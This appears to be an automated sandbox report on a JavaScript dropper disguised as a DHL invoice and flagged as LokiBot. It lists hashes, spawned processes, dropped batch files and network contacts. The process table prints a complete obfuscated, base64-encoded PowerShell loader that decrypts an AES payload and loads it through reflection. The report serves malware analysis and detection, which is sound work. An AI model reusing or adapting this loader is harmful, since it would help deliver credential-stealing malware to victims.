File name: | latest DHL invoice -060025078.js |
Full analysis: | https://app.any.run/tasks/6cc1eb5b-336a-4544-801f-2191da6a0383 |
Verdict: | Malicious activity |
Threats: | LokiBot was developed in 2015 to steal information from a variety of applications. Despite the age, this malware is still rather popular among cybercriminals. |
Analysis date: | May 10, 2025, 03:46:54 |
OS: | Windows 10 Professional (build: 19044, 64 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines (51124), with CRLF line terminators |
MD5: | 0B40D5F1C02D0BD0E44423608846A825 |
SHA1: | 5A1F5D18A42FFF6DCD240878B65DFC6238A80BEE |
SHA256: | 15CA4752338D2D614C117740EC81D65AFADF1F5AE55BBAFB20984CE67756D677 |
SSDEEP: | 6144:RgpeCqZwv2SKuZecLOEGnOxL3Pxz8II8goLRWX2rXkvLn5:RVwOSKuZef7OxjPaX2rXkvLn5 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
720 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1616 | "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRneXZ5dCA9IEAnDQokaGtvYXdzdmJ3dnZ1d3N2ZGxjbXB3c3ZhID0gJHdzdmVudjpVd3N2U0VSTkF3c3ZNRTskbXdzdmpxZXNod3N2anN1cXR3c3ZscnZ3IHdzdj0gIkM6d3N2XFVzZXJ3c3ZzXCRoa3dzdm9hYnd2d3N2dnVkbGN3c3ZtcGFcZHdzdndtLmJhd3N2dCI7aWZ3c3YgKFRlc3dzdnQtUGF0d3N2aCAkbWp3c3ZxZXNoandzdnN1cXRsd3N2cnZ3KSB3c3Z7ICAgIHdzdldyaXRld3N2LUhvc3R3c3YgIkJhdHdzdmNoIGZpd3N2bGUgZm93c3Z1bmQ6IHdzdiRtanFld3N2c2hqc3V3c3ZxdGxydndzdnciIC1Gd3N2b3JlZ3J3c3ZvdW5kQ3dzdm9sb3Igd3N2Q3lhbjt3c3YgICAgJHdzdmZpbGVMd3N2aW5lcyB3c3Y9IFtTeXdzdnN0ZW0ud3N2SU8uRml3c3ZsZV06OndzdlJlYWRBd3N2bGxMaW53c3ZlcygkbXdzdmpxZXNod3N2anN1cXR3c3ZscnZ3LHdzdiBbU3lzd3N2dGVtLlR3c3ZleHQuRXdzdm5jb2Rpd3N2bmddOjp3c3ZVVEY4KXdzdjsgICAgd3N2Zm9yZWF3c3ZjaCAoJHdzdmxpbmUgd3N2aW4gJGZ3c3ZpbGVMaXdzdm5lcykgd3N2eyAgICB3c3YgICAgaXdzdmYgKCRsd3N2aW5lIC13c3ZtYXRjaHdzdiAnXjo6d3N2OiA/KC53c3YrKSQnKXdzdiB7ICAgd3N2ICAgICB3c3YgICAgV3dzdnJpdGUtd3N2SG9zdCB3c3YiSW5qZXdzdmN0aW9ud3N2IGNvZGV3c3YgZGV0ZXdzdmN0ZWQgd3N2aW4gdGh3c3ZlIGJhdHdzdmNoIGZpd3N2bGUuIiB3c3YtRm9yZXdzdmdyb3Vud3N2ZENvbG93c3ZyIEN5YXdzdm47ICAgd3N2ICAgICB3c3YgICAgdHdzdnJ5IHsgd3N2ICAgICB3c3YgICAgIHdzdiAgICAgd3N2JGRlY293c3ZkZWRCeXdzdnRlcyA9d3N2IFtTeXN3c3Z0ZW0uQ3dzdm9udmVyd3N2dF06OkZ3c3Zyb21CYXdzdnNlNjRTd3N2dHJpbmd3c3YoJG1hdHdzdmNoZXNbd3N2MV0uVHJ3c3ZpbSgpKXdzdjsgICAgd3N2ICAgICB3c3YgICAgIHdzdiAgJGlud3N2amVjdGl3c3ZvbkNvZHdzdmUgPSBbd3N2U3lzdGV3c3ZtLlRleHdzdnQuRW5jd3N2b2Rpbmd3c3ZdOjpVbndzdmljb2Rld3N2LkdldFN3c3Z0cmluZ3dzdigkZGVjd3N2b2RlZEJ3c3Z5dGVzKXdzdjsgICAgd3N2ICAgICB3c3YgICAgIHdzdiAgV3Jpd3N2dGUtSG93c3ZzdCAiSXdzdm5qZWN0d3N2aW9uIGN3c3ZvZGUgZHdzdmVjb2Rld3N2ZCBzdWN3c3ZjZXNzZndzdnVsbHkud3N2IiAtRm93c3ZyZWdyb3dzdnVuZENvd3N2bG9yIEd3c3ZyZWVuO3dzdiAgICAgd3N2ICAgICB3c3YgICAgIHdzdiBXcml0d3N2ZS1Ib3N3c3Z0ICJFeHdzdmVjdXRpd3N2bmcgaW53c3ZqZWN0aXdzdm9uIGNvd3N2ZGUuLi53c3YiIC1Gb3dzdnJlZ3Jvd3N2dW5kQ293c3Zsb3IgWXdzdmVsbG93d3N2OyAgICB3c3YgICAgIHdzdiAgICAgd3N2ICBJbnZ3c3Zva2UtRXdzdnhwcmVzd3N2c2lvbiB3c3YkaW5qZXdzdmN0aW9ud3N2Q29kZTt3c3YgICAgIHdzdiAgICAgd3N2ICAgICB3c3YgYnJlYXdzdms7ICAgd3N2ICAgICB3c3YgICAgfXdzdiBjYXRjd3N2aCB7ICB3c3YgICAgIHdzdiAgICAgd3N2ICAgIFd3c3ZyaXRlLXdzdkhvc3Qgd3N2IkVycm93c3ZyIGR1cndzdmluZyBkd3N2ZWNvZGl3c3ZuZyBvcndzdiBleGVjd3N2dXRpbmd3c3YgaW5qZXdzdmN0aW9ud3N2IGNvZGV3c3Y6ICRfIndzdiAtRm9yd3N2ZWdyb3V3c3ZuZENvbHdzdm9yIFJld3N2ZDsgICB3c3YgICAgIHdzdiAgICB9d3N2OyAgICB3c3YgICAgfXdzdjsgICAgd3N2fTt9IGV3c3Zsc2Uge3dzdiAgICAgd3N2IFdyaXR3c3ZlLUhvc3dzdnQgIlN5d3N2c3RlbSB3c3ZFcnJvcndzdjogQmF0d3N2Y2ggZml3c3ZsZSBub3dzdnQgZm91d3N2bmQ6ICR3c3ZtanFlc3dzdmhqc3Vxd3N2dGxydnd3c3YiIC1Gb3dzdnJlZ3Jvd3N2dW5kQ293c3Zsb3IgUndzdmVkOyAgd3N2ICBleGl3c3Z0O307ZndzdnVuY3Rpd3N2b24gYWZ3c3ZxZWR1cXdzdnBsbG13d3N2Y3pnKCR3c3ZwYXJhbXdzdl92YXIpd3N2ewkkYWV3c3ZzX3Zhcndzdj1bU3lzd3N2dGVtLlN3c3ZlY3VyaXdzdnR5LkNyd3N2eXB0b2d3c3ZyYXBoeXdzdi5BZXNdd3N2OjpDcmV3c3ZhdGUoKXdzdjsJJGFld3N2c192YXJ3c3YuTW9kZXdzdj1bU3lzd3N2dGVtLlN3c3ZlY3VyaXdzdnR5LkNyd3N2eXB0b2d3c3ZyYXBoeXdzdi5DaXBod3N2ZXJNb2R3c3ZlXTo6Q3dzdkJDOwkkd3N2YWVzX3Z3c3Zhci5QYXdzdmRkaW5nd3N2PVtTeXN3c3Z0ZW0uU3dzdmVjdXJpd3N2dHkuQ3J3c3Z5cHRvZ3dzdnJhcGh5d3N2LlBhZGR3c3ZpbmdNb3dzdmRlXTo6d3N2UEtDUzd3c3Y7CSRhZXdzdnNfdmFyd3N2LktleT13c3ZbU3lzdHdzdmVtLkNvd3N2bnZlcnR3c3ZdOjpGcndzdm9tQmFzd3N2ZTY0U3R3c3ZyaW5nKHdzdidHTW8zd3N2OHBtdFN3c3ZLM2lUVndzdkdjQlNtd3N2VWlIYjV3c3YweFBicndzdjYxdTE4d3N2cFNsTjl3c3ZjSUZZPXdzdicpOwkkd3N2YWVzX3Z3c3Zhci5JVndzdj1bU3lzd3N2dGVtLkN3c3ZvbnZlcndzdnRdOjpGd3N2cm9tQmF3c3ZzZTY0U3dzdnRyaW5nd3N2KCcvTGR3c3ZTSEt5TndzdmMvTlB0d3N2UEtDa0h3c3ZJYkpBPXdzdj0nKTsJd3N2JGRlY3J3c3Z5cHRvcndzdl92YXI9d3N2JGFlc193c3Z2YXIuQ3dzdnJlYXRld3N2RGVjcnl3c3ZwdG9yKHdzdik7CSRyd3N2ZXR1cm53c3ZfdmFyPXdzdiRkZWNyd3N2eXB0b3J3c3ZfdmFyLndzdlRyYW5zd3N2Zm9ybUZ3c3ZpbmFsQndzdmxvY2sod3N2JHBhcmF3c3ZtX3ZhcndzdiwgMCwgd3N2JHBhcmF3c3ZtX3Zhcndzdi5MZW5nd3N2dGgpOwl3c3YkZGVjcndzdnlwdG9yd3N2X3Zhci53c3ZEaXNwb3dzdnNlKCk7d3N2CSRhZXN3c3ZfdmFyLndzdkRpc3Bvd3N2c2UoKTt3c3YJJHJldHdzdnVybl92d3N2YXI7fWZ3c3Z1bmN0aXdzdm9uIHF3d3N2eXZwZHR3c3ZpdG15dndzdmRibSgkd3N2cGFyYW13c3ZfdmFyKXdzdnsJJG5wd3N2bWxra2x3c3ZxenN0bndzdnRpcz1Od3N2ZXctT2J3c3ZqZWN0IHdzdlN5c3Rld3N2bS5JTy53c3ZNZW1vcndzdnlTdHJld3N2YW0oLCR3c3ZwYXJhbXdzdl92YXIpd3N2Owkkc213c3ZqYmpueXdzdnZ1cGh4d3N2d3NmPU53c3Zldy1PYndzdmplY3Qgd3N2U3lzdGV3c3ZtLklPLndzdk1lbW9yd3N2eVN0cmV3c3ZhbTsJJHdzdnptb3p5d3N2d2tyb3d3c3ZmZ3pkd3dzdj1OZXctd3N2T2JqZWN3c3Z0IFN5c3dzdnRlbS5Jd3N2Ty5Db213c3ZwcmVzc3dzdmlvbi5Hd3N2WmlwU3R3c3ZyZWFtKHdzdiRucG1sd3N2a2tscXp3c3ZzdG50aXdzdnMsIFtJd3N2Ty5Db213c3ZwcmVzc3dzdmlvbi5Dd3N2b21wcmV3c3Zzc2lvbndzdk1vZGVdd3N2OjpEZWN3c3ZvbXByZXdzdnNzKTsJd3N2JHptb3p3c3Z5d2tyb3dzdndmZ3pkd3N2dy5Db3B3c3Z5VG8oJHdzdnNtamJqd3N2bnl2dXB3c3ZoeHdzZndzdik7CSR6d3N2bW96eXd3c3Zrcm93Zndzdmd6ZHcud3N2RGlzcG93c3ZzZSgpO3dzdgkkbnBtd3N2bGtrbHF3c3Z6c3RudHdzdmlzLkRpd3N2c3Bvc2V3c3YoKTsJJHdzdnNtamJqd3N2bnl2dXB3c3ZoeHdzZndzdi5EaXNwd3N2b3NlKCl3c3Y7CSRzbXdzdmpiam55d3N2dnVwaHh3c3Z3c2YuVHdzdm9BcnJhd3N2eSgpO313c3ZmdW5jdHdzdmlvbiBqd3N2ZGV1ZW93c3ZvaWlha3dzdnhya3Qod3N2JHBhcmF3c3ZtX3ZhcndzdiwkcGFyd3N2YW0yX3Z3c3Zhcil7CXdzdiRxYXpid3N2dWxtY3J3c3Z5cHVydndzdmQ9W1N5d3N2c3RlbS53c3ZSZWZsZXdzdmN0aW9ud3N2LkFzc2V3c3ZtYmx5XXdzdjo6KCdkd3N2YW9MJ1t3c3YtMS4uLXdzdjRdIC1qd3N2b2luICd3c3YnKShbYndzdnl0ZVtdd3N2XSRwYXJ3c3ZhbV92YXdzdnIpOwkkd3N2bW95dHR3c3ZnenRrd3dzdmh1dWZld3N2PSRxYXp3c3ZidWxtY3dzdnJ5cHVyd3N2dmQuRW53c3Z0cnlQb3dzdmludDsJd3N2JG1veXR3c3Z0Z3p0a3dzdndodXVmd3N2ZS5JbnZ3c3Zva2UoJHdzdm51bGwsd3N2ICRwYXJ3c3ZhbTJfdndzdmFyKTt9d3N2JGhvc3R3c3YuVUkuUndzdmF3VUkud3N2V2luZG93c3Z3VGl0bHdzdmUgPSAkd3N2bWpxZXN3c3ZoanN1cXdzdnRscnZ3d3N2OyRmZGF3c3Zqd2FkcXdzdnVpZ2Z4d3N2eXk9W1N3c3Z5c3RlbXdzdi5JTy5Gd3N2aWxlXTp3c3Y6KCd0eHdzdmVUbGxBd3N2ZGFlUid3c3ZbLTEuLndzdi0xMV0gd3N2LWpvaW53c3YgJycpKHdzdiRtanFld3N2c2hqc3V3c3ZxdGxydndzdncpLlNwd3N2bGl0KFt3c3ZFbnZpcndzdm9ubWVud3N2dF06Ok53c3Zld0xpbndzdmUpO2Zvd3N2cmVhY2h3c3YgKCRibXdzdnV3amp4d3N2cnRha2h3c3ZnZ2sgaXdzdm4gJGZkd3N2YWp3YWR3c3ZxdWlnZndzdnh5eSkgd3N2ewlpZiB3c3YoJGJtdXdzdndqanhyd3N2dGFraGd3c3Znay5TdHdzdmFydHNXd3N2aXRoKCd3c3Y6OiAnKXdzdikJewkJd3N2JHd1a2p3c3ZnYXpudndzdnVqdHZ2d3N2bD0kYm13c3Z1d2pqeHdzdnJ0YWtod3N2Z2drLlN3c3Z1YnN0cndzdmluZygzd3N2KTsJCWJ3c3ZyZWFrO3dzdgl9fSRkd3N2emFqYnp3c3ZpcGZxeXdzdmNxanc9d3N2W3N0cml3c3ZuZ1tdXXdzdiR3dWtqd3N2Z2F6bnZ3c3Z1anR2dndzdmwuU3Bsd3N2aXQoJ1x3c3YnKTskdHdzdnRoa3dzd3N2c2Jqemh3c3Z5Y3liPXdzdnF3eXZwd3N2ZHRpdG13c3Z5dmRibXdzdiAoYWZxd3N2ZWR1cXB3c3ZsbG13Y3dzdnpnIChbd3N2Q29udmV3c3ZydF06OndzdkZyb21Cd3N2YXNlNjR3c3ZTdHJpbndzdmcoJGR6d3N2YWpieml3c3ZwZnF5Y3dzdnFqd1swd3N2XSkpKTt3c3YkbmVtYndzdnhsZ3dmd3N2bHBidmR3c3ZuPXF3eXdzdnZwZHRpd3N2dG15dmR3c3ZibSAoYXdzdmZxZWR1d3N2cXBsbG13c3Z3Y3pnIHdzdihbQ29ud3N2dmVydF13c3Y6OkZyb3dzdm1CYXNld3N2NjRTdHJ3c3ZpbmcoJHdzdmR6YWpid3N2emlwZnF3c3Z5Y3Fqd3dzdlsxXSkpd3N2KTtqZGV3c3Z1ZW9vaXdzdmlha3hyd3N2a3QgJHR3c3Z0aGt3c3dzdnNianpod3N2eWN5YiB3c3YkbnVsbHdzdjtqZGV1d3N2ZW9vaWl3c3Zha3hya3dzdnQgJG5ld3N2bWJ4bGd3c3Z3ZmxwYndzdnZkbiAod3N2LFtzdHJ3c3ZpbmdbXXdzdl0gKCcld3N2KicpKTsNCidADQoNCiRoenN5eiA9ICRneXZ5dCAtcmVwbGFjZSAnd3N2JywgJycNCg0KSW52b2tlLUV4cHJlc3Npb24gJGh6c3l6DQo=')) | Invoke-Expression" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
2136 | C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\orpmdwzioqovzlm.bat" | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
2384 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
4996 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\latest DHL invoice -060025078.js" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
5800 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5972 | "C:\Windows\System32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\orpmdwzioqovzlm.bat" | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6032 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6708 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (4996) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe |
Operation: | write | Name: | JScriptSetScriptStateStarted |
Value: FCBE100000000000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1616 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_snl4qvpt.l5q.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
1616 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fd0zy33n.uft.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
2136 | cmd.exe | C:\Users\admin\dwm.bat | text | |
MD5:19D74F77278915F638C8FE9686C7CBBD | SHA256:2451EAC91C1A288AB14CAED84AFB2968EAAC49B6E8118DAED5D9EFEB15A5A735 | |||
1616 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
4996 | wscript.exe | C:\Users\admin\AppData\Local\Temp\orpmdwzioqovzlm.bat | text | |
MD5:19D74F77278915F638C8FE9686C7CBBD | SHA256:2451EAC91C1A288AB14CAED84AFB2968EAAC49B6E8118DAED5D9EFEB15A5A735 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 2.16.164.49:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6644 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
6644 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 2.16.164.49:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
— | — | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6544 | svchost.exe | 20.190.160.130:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
2104 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6644 | SIHClient.exe | 4.245.163.56:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |